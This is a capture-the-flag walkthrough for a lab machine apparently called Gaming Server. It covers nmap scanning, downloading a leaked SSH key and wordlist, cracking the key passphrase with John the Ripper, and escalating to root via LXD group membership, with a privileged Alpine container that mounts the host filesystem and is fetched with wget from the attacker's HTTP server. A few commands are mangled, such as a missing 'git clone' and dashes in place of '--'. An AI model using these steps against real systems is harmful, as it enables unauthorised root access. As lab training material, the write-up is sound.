- Introduction
- Scanning and Enumeration
- Exploiting
- Capture User flag and Privilege Escalation
Introduction
How about if your normal user can be escalated to root without sudo rights and even without entering password !!! This is what Gaming Server machine is to learn new about different from other past machines.
If you are not aware of LXC and LXD virtualization container technologies go have a look before you start solving this box.
link: https://www.hackingarticles.in/lxd-privilege-escalation/
Initial footholds are easy to find out requires a bit of enumeration and scanning just like other CTF style boxes and you are done with initial user shell.
Scanning and Enumeration
Scanning is as usual as always, starting with Nmap scan, which gives us 2 ports open.
port 22 (ssh) and port 80 (http)
$ nmap -v -sV -sC <ip_addr>
Here we get port 80 and 22 which definitely means we’ll some how get ssh creds enumerating web page only or either this way or that snooping around web host only.
lets snoop around the web host, but before that start dirbuster so that we can get if there are any hidden directories.
Looking around the web page couldn’t find anything interesting other than the robots.txt page and a username (can say) in the source code of the web page.
Here we got a directory uploads and a username john, lets head towards the directory and have a look if it contains something interesting.
dict.lst seems to be some passwords list save and keep it aside for a while and check what we got from dirbuster results.
$ wget http://<machine-ip>/uploads/dict.lst
Dirbuster gave us secret directory which contains something secret, i.e the private ssh keys.
lets save the file as id_rsa and try to bruteforce it using johntheripper with dict.lst we found earlier, as a wordlist.
$ python3 /usr/share/john/ssh2john.py id_rsa > rsa.hash
$ john — wordlist=dict.lst rsa.hash
Vola, we successfully cracked the hash and got a passphrase lets try to login using john as username with passphrase we cracked above.
$ chmod 600 id_rsa
$ ssh -i id_rsa john@<machine-ip>
wooohoo !!! There we go, we got user flag.
let’s jump and try to get root access escalate privilege……
Privilege Escalation
Here have a look above and we found john is in LXD group, so here comes exploiting LXD exploitation.
$ https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine
Here above we have generated an image file, lets get onto the target machine and download image file there in that machine.
$ python -m SimpleHTTPServer
$ wget http://<ip-add>/imagefilename.tar.gz
$ lxc image import ./imagefilename.tar.gz — alias myimage
$ lxc image list
$ lxc init myimage ignite -c security.privileged=true
$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start ignite
$ lxc exec ignite /bin/sh
Boom we are root now!
Grab root flag in /mnt/root/root
Conclusion
I hope it was enjoyable and helpful for you.
Thanks for your time.
